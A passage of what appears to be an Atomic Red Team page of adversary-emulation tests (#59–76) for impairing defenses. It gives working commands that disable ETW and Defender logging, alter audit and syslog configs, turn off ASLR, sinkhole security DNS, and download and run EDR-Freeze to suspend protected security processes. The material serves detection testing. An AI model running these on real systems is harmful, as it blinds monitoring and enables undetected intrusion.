New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application -Name Start -Value 1 -PropertyType "DWord" -Force

Atomic Test #59: Disable EventLog-Application ETW Provider Via Registry - Cmd

This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.

Supported Platforms: Windows

auto_generated_guid: 1cac9b54-810e-495c-8aac-989e0076583b

Inputs

NameDescriptionTypeDefault Value
ETWProviderGUIDMicrosoft-Windows-SenseIR ETW Provider GUIDstring{B6D775EF-1436-4FE6-BAD3-9E436319E218}

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" /v "Enabled" /t REG_DWORD /d "0" /f

Cleanup Commands

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" /v "Enabled" /t REG_DWORD /d "1" /f

Atomic Test #60: Disable EventLog-Application ETW Provider Via Registry - PowerShell

This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.

Supported Platforms: Windows

auto_generated_guid: 8f907648-1ebf-4276-b0f0-e2678ca474f0

Inputs

NameDescriptionTypeDefault Value
ETWProviderGUIDMicrosoft-Windows-SenseIR ETW Provider GUIDstring{B6D775EF-1436-4FE6-BAD3-9E436319E218}

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" -Name Enabled -Value 0 -PropertyType "DWord" -Force

Cleanup Commands

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" -Name Enabled -Value 1 -PropertyType "DWord" -Force

Atomic Test #61: Freeze PPL-protected process with EDR-Freeze

This test utilizes the tool EDR-Freeze, which leverages the native Microsoft binary WerFaultSecure.exe to suspend processes protected by the Protected Process Light mechanism. PPL is a Windows security feature designed to safeguard critical system processes — such as those related to antivirus, credential protection, and system integrity — from tampering or inspection. These processes operate in a restricted environment that prevents access even from administrators or debugging tools, unless the accessing tool is signed and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently trusted by the operating system, EDR-Freeze is able to bypass these restrictions and temporarily freeze PPL-protected processes for analysis or testing purposes.

Supported Platforms: Windows

auto_generated_guid: cbb2573a-a6ad-4c87-aef8-6e175598559b

Inputs

NameDescriptionTypeDefault Value
processNamePPL-protected process name to targetstringSecurityHealthService

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

# Enable SeDebugPrivilege
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;

public class TokenAdjuster {
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);

    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out long lpLuid);

    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool AdjustTokenPrivileges(IntPtr TokenHandle, bool DisableAllPrivileges,
        ref TOKEN_PRIVILEGES NewState, uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);

    [StructLayout(LayoutKind.Sequential, Pack = 1)]
    public struct TOKEN_PRIVILEGES {
        public int PrivilegeCount;
        public long Luid;
        public int Attributes;
    }

    public const int SE_PRIVILEGE_ENABLED = 0x00000002;
    public const uint TOKEN_ADJUST_PRIVILEGES = 0x0020;
    public const uint TOKEN_QUERY = 0x0008;

    public static bool EnableSeDebugPrivilege() {
        IntPtr hToken;
        if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))
            return false;

        long luid;
        if (!LookupPrivilegeValue(null, "SeDebugPrivilege", out luid))
            return false;

        TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
        tp.PrivilegeCount = 1;
        tp.Luid = luid;
        tp.Attributes = SE_PRIVILEGE_ENABLED;

        return AdjustTokenPrivileges(hToken, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
    }
}
"@

$result = [TokenAdjuster]::EnableSeDebugPrivilege()
if ($result) {
    Write-Host "SeDebugPrivilege enabled successfully." -ForegroundColor Green
} else {
    Write-Host "Failed to enable SeDebugPrivilege." -ForegroundColor Red
    exit 1
}

# Get basic process info
$process = Get-Process -Name $#{processName} -ErrorAction Stop
$processName = $process.ProcessName
Write-Host "Process Name: $processName)"
Write-Host "PID: $($process.Id)"

# Get executable path and user info
$query = "SELECT * FROM Win32_Process WHERE Name = '$processName.exe'"
$wmiProcess = Get-WmiObject -Query $query

$owner = $wmiProcess.GetOwner()
    Write-Host "User: $($owner.Domain)\$($owner.User)"


# Get the folder of the current script
$scriptFolder = Split-Path -Parent $MyInvocation.MyCommand.Definition

# Download latest EDR-Freeze package and extract (force replace)
$downloadUrl = "https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip"
$zipPath = Join-Path $scriptFolder "EDR-Freeze_1.0.zip"
Write-Host "Downloading latest EDR-Freeze from $downloadUrl" -ForegroundColor Cyan
try {
    Invoke-WebRequest -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop
    Write-Host "Download completed: $zipPath" -ForegroundColor Green
    $extractFolder = $scriptFolder
    if (Test-Path $zipPath) {
        Write-Host "Extracting archive to $extractFolder (overwriting existing files)" -ForegroundColor Cyan
        if (Test-Path $extractFolder) {
            # Ensure target exe not locked; attempt to stop any running instance silently
            Get-Process -Name "EDR-Freeze_1.0" -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction SilentlyContinue
        }
        Add-Type -AssemblyName System.IO.Compression.FileSystem 2>$null
        # Custom extraction routine (overwrite existing) compatible with .NET Framework (no bool overwrite overload)
        $archive = $null
        try {
            $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)
            foreach ($entry in $archive.Entries) {
                if ([string]::IsNullOrWhiteSpace($entry.FullName)) { continue }
                if ($entry.FullName.EndsWith('/')) { # directory entry
                    $dirPath = Join-Path $extractFolder $entry.FullName
                    if (-not (Test-Path $dirPath)) { New-Item -ItemType Directory -Path $dirPath -Force | Out-Null }
                    continue
                }
                $destPath = Join-Path $extractFolder $entry.FullName
                $destDir = Split-Path $destPath -Parent
                if (-not (Test-Path $destDir)) { New-Item -ItemType Directory -Path $destDir -Force | Out-Null }
                if (Test-Path $destPath) { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }
                try {
                    # Use static extension method (PowerShell 5.1 compatible)
                    [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry, $destPath, $false)
                } catch {
                    Write-Host "Failed to extract entry $($entry.FullName): $_" -ForegroundColor Yellow
                }
            }
            Write-Host "Extraction completed." -ForegroundColor Green
        } finally {
            if ($archive) { $archive.Dispose() }
        }
    }
} catch {
    Write-Host "Failed to download or extract EDR-Freeze: $_" -ForegroundColor Red
}

# Wait 15s before putting targeted process before putting it in the comma
Write-Host "Waiting 15s before putting $processName in the comma" -ForegroundColor Yellow
Start-Sleep -Seconds 5
Write-Host "Waiting 10s before putting $processName in the comma" -ForegroundColor Yellow
Start-Sleep -Seconds 5
Write-Host "Waiting 5s before putting $processName in the comma" -ForegroundColor Yellow
Start-Sleep -Seconds 3
Write-Host "Waiting 2s before putting $processName in the comma" -ForegroundColor Yellow
Start-Sleep -Seconds 2

# Put targeted  process in the comma for 15s
# Discover the EDR-Freeze executable dynamically (pick most recent if multiple)
$edrFreezeExeName = Get-ChildItem -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue |
    Sort-Object LastWriteTime -Descending |
    Select-Object -First 1 -ExpandProperty Name
if (-not $edrFreezeExeName) {
    Write-Host "No EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder" -ForegroundColor Red
    exit 1
}

$edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName
Write-Host "Using EDR-Freeze executable: $edrFreezeExeName" -ForegroundColor Cyan
Write-Host "$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)" -ForegroundColor Yellow
Start-Process -FilePath $edrFreezeExe -ArgumentList ("$($process.Id) 15000") | Out-Null

Cleanup Commands

Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
Write-Output "File deleted: $edrFreezeExe"

Atomic Test #62: Disable ASLR Via sysctl parameters - Linux

Detects Execution of the sysctl command to set kernel.randomize_va_space=0 which disables Address Space Layout Randomization (ASLR) in Linux.

Supported Platforms: Linux

auto_generated_guid: ac333fe1-ce2b-400b-a117-538634427439

Attack Commands: Run with bash! Elevation Required (e.g. root or admin)

sysctl -w kernel.randomize_va_space=0

Cleanup Commands

sysctl -w kernel.randomize_va_space=2

Atomic Test #63: Auditing Configuration Changes on Linux Host

Emulates modification of auditd configuration files

Supported Platforms: Linux

auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3

Inputs

NameDescriptionTypeDefault Value
audisp_config_file_nameThe name of the audispd configuration file to be changedstringaudispd.conf
auditd_config_file_nameThe name of the auditd configuration file to be changedstringauditd.conf
libaudit_config_file_nameThe name of the libaudit configuration file to be changedstringlibaudit.conf

Attack Commands: Run with bash! Elevation Required (e.g. root or admin)

sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}

Cleanup Commands

sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}

Atomic Test #64: Auditing Configuration Changes on FreeBSD Host

Emulates modification of auditd configuration files

Supported Platforms: Linux

auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd

Inputs

NameDescriptionTypeDefault Value
auditd_config_file_nameThe name of the auditd configuration file to be changedstringaudit_event

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}

Cleanup Commands

sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}

Atomic Test #65: Logging Configuration Changes on Linux Host

Emulates modification of syslog configuration.

Supported Platforms: Linux

auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c

Inputs

NameDescriptionTypeDefault Value
syslog_config_file_nameThe name of the syslog configuration file to be changedstringsyslog.conf
rsyslog_config_file_nameThe name of the rsyslog configuration file to be changedstringrsyslog.conf
syslog_ng_config_file_nameThe name of the syslog-ng configuration file to be changedstringsyslog-ng.conf

Attack Commands: Run with bash! Elevation Required (e.g. root or admin)

if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi

Cleanup Commands

if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi

Atomic Test #66: Logging Configuration Changes on FreeBSD Host

Emulates modification of syslog configuration.

Supported Platforms: Linux

auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8

Inputs

NameDescriptionTypeDefault Value
syslog_config_file_nameThe name of the syslog configuration file to be changedstringsyslog.conf

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi

Cleanup Commands

if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi

Atomic Test #67: Disable Powershell ETW Provider - Windows

This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.

Supported Platforms: Windows

auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84

Inputs

NameDescriptionTypeDefault Value
ps_exec_locationLocation of PSExec.stringPathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe
sessionThe session to disable.stringEventLog-Application
providerThe provider to disable.stringMicrosoft-Windows-Powershell

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets

Cleanup Commands

cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets

Dependencies: Run with powershell!

Description: PSExec must be installed on the machine.
Check Prereq Commands
if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
Get Prereq Commands
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force

Atomic Test #68: Disable .NET Event Tracing for Windows Via Registry (cmd)

Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry

Supported Platforms: Windows

auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0

Cleanup Commands

REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1

Atomic Test #69: Disable .NET Event Tracing for Windows Via Registry (powershell)

Disables ETW for the .NET Framework using PowerShell to update the Windows registry

Supported Platforms: Windows

auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force

Cleanup Commands

REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1

Atomic Test #70: LockBit Black - Disable the ETW Provider of Windows Defender -cmd

An adversary can disable the ETW Provider of Windows Defender, so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a

Supported Platforms: Windows

auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f

Cleanup Commands

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1

Atomic Test #71: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell

An adversary can disable the ETW Provider of Windows Defender, so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a

Supported Platforms: Windows

auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled  -PropertyType DWord -Value 0 -Force

Cleanup Commands

Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore

Atomic Test #72: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd

Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.

Supported Platforms: Windows

auto_generated_guid: fdac1f79-b833-4bab-b4a1-11b1ed676a4b

Attack Commands: Run with command_prompt!

REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f

Cleanup Commands

REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1

Atomic Test #73: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell

Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.

Supported Platforms: Windows

auto_generated_guid: b42c1f8c-399b-47ae-8fd8-763181395fee

Attack Commands: Run with powershell!

New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force

Cleanup Commands

Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled

Atomic Test #74: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd

Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.

Supported Platforms: Windows

auto_generated_guid: 110b4281-43fe-405f-a184-5d8eaf228ebf

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f

Cleanup Commands

REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1

Atomic Test #75: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell

Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.

Supported Platforms: Windows

auto_generated_guid: 4d61779d-be7f-425c-b560-0cafb2522911

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force

Cleanup Commands

Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled

Atomic Test #76: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table

Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.

Supported Platforms: Windows

auto_generated_guid: 1174b5df-2c33-490f-8854-f5eb80c907ca

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Clear-DnsClientCache

Cleanup Commands

try {
    # Get all current NRPT rules
        $DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }

    # Remove each NRPT rule
        foreach ($rule in $DnsClientNrptRules) {
            Remove-DnsClientNrptRule -Name $rule.Name -Force
        }

    # Clear DNS client cache
    Clear-DnsClientCache
    Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
}

catch {
    Write-Host "An error occurred: $_"
}
Clear-DnsClientCache

Atomic test(s) for this technique last updated: 2026-05-02 03:10:14 UTC

T1685.006

Disable or Modify Tools: Clear Linux or Mac System Logs

T1686

Disable or Modify System Firewall

On this page

Description from ATT&CK
Atomic Tests
Atomic Test #1: Windows Disable LSA Protection
Atomic Test #2: Disable journal logging via systemctl utility
Atomic Test #3: Disable journal logging via sed utility
Atomic Test #4: Disable syslog
Atomic Test #5: Disable syslog (freebsd)
Atomic Test #6: Disable Cb Response
Atomic Test #7: Disable SELinux
Atomic Test #8: Stop Crowdstrike Falcon on Linux
Atomic Test #9: Disable Carbon Black Response
Atomic Test #10: Disable LittleSnitch
Atomic Test #11: Disable OpenDNS Umbrella
Atomic Test #12: Disable macOS Gatekeeper
Atomic Test #13: Stop and unload Crowdstrike Falcon on macOS
Atomic Test #14: Unload Sysmon Filter Driver
Atomic Test #15: Uninstall Sysmon
Atomic Test #16: AMSI Bypass - AMSI InitFailed
Atomic Test #17: AMSI Bypass - Remove AMSI Provider Reg Key
Atomic Test #18: Disable Arbitrary Security Windows Service
Atomic Test #19: Tamper with Windows Defender ATP PowerShell
Atomic Test #20: Tamper with Windows Defender Command Prompt
Atomic Test #21: Tamper with Windows Defender Registry
Atomic Test #22: Disable Microsoft Office Security Features
Atomic Test #23: Remove Windows Defender Definition Files
Atomic Test #24: Stop and Remove Arbitrary Security Windows Service
Atomic Test #25: Uninstall Crowdstrike Falcon on Windows
Atomic Test #26: Tamper with Windows Defender Evade Scanning -Folder
Atomic Test #27: Tamper with Windows Defender Evade Scanning -Extension
Atomic Test #28: Tamper with Windows Defender Evade Scanning -Process
Atomic Test #29: office-365-Disable-AntiPhishRule
Atomic Test #30: Disable Windows Defender with DISM
Atomic Test #31: Disable Defender Using NirSoft AdvancedRun
Atomic Test #32: Kill antimalware protected processes using Backstab
Atomic Test #33: WinPwn - Kill the event log services for stealth
Atomic Test #34: Tamper with Windows Defender ATP using Aliases - PowerShell
Atomic Test #35: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd
Atomic Test #36: LockBit Black - Use Registry Editor to turn on automatic logon -cmd
Atomic Test #37: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell
Atomic Test #38: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell
Atomic Test #39: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
Atomic Test #40: WMIC Tamper with Windows Defender Evade Scanning Folder
Atomic Test #41: Delete Windows Defender Scheduled Tasks
Atomic Test #42: Clear History
Atomic Test #43: Suspend History
Atomic Test #44: Reboot Linux Host via Kernel System Request
Atomic Test #45: Clear Pagging Cache
Atomic Test #46: Disable Memory Swap
Atomic Test #47: Disable Hypervisor-Enforced Code Integrity (HVCI)
Atomic Test #48: AMSI Bypass - Override AMSI via COM
Atomic Test #49: AWS - GuardDuty Suspension or Deletion
Atomic Test #50: Tamper with Defender ATP on Linux/MacOS
Atomic Test #51: Tamper with Windows Defender Registry - Reg.exe
Atomic Test #52: Tamper with Windows Defender Registry - Powershell
Atomic Test #53: ESXi - Disable Account Lockout Policy via PowerCLI
Atomic Test #54: Delete Microsoft Defender ASR Rules - InTune
Atomic Test #55: Delete Microsoft Defender ASR Rules - GPO
Atomic Test #56: AMSI Bypass - Create AMSIEnable Reg Key
Atomic Test #57: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
Atomic Test #58: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
Atomic Test #59: Disable EventLog-Application ETW Provider Via Registry - Cmd
Atomic Test #60: Disable EventLog-Application ETW Provider Via Registry - PowerShell
Atomic Test #61: Freeze PPL-protected process with EDR-Freeze
Atomic Test #62: Disable ASLR Via sysctl parameters - Linux
Atomic Test #63: Auditing Configuration Changes on Linux Host
Atomic Test #64: Auditing Configuration Changes on FreeBSD Host
Atomic Test #65: Logging Configuration Changes on Linux Host
Atomic Test #66: Logging Configuration Changes on FreeBSD Host
Atomic Test #67: Disable Powershell ETW Provider - Windows
Atomic Test #68: Disable .NET Event Tracing for Windows Via Registry (cmd)
Atomic Test #69: Disable .NET Event Tracing for Windows Via Registry (powershell)
Atomic Test #70: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
Atomic Test #71: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
Atomic Test #72: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
Atomic Test #73: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
Atomic Test #74: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
Atomic Test #75: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
Atomic Test #76: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table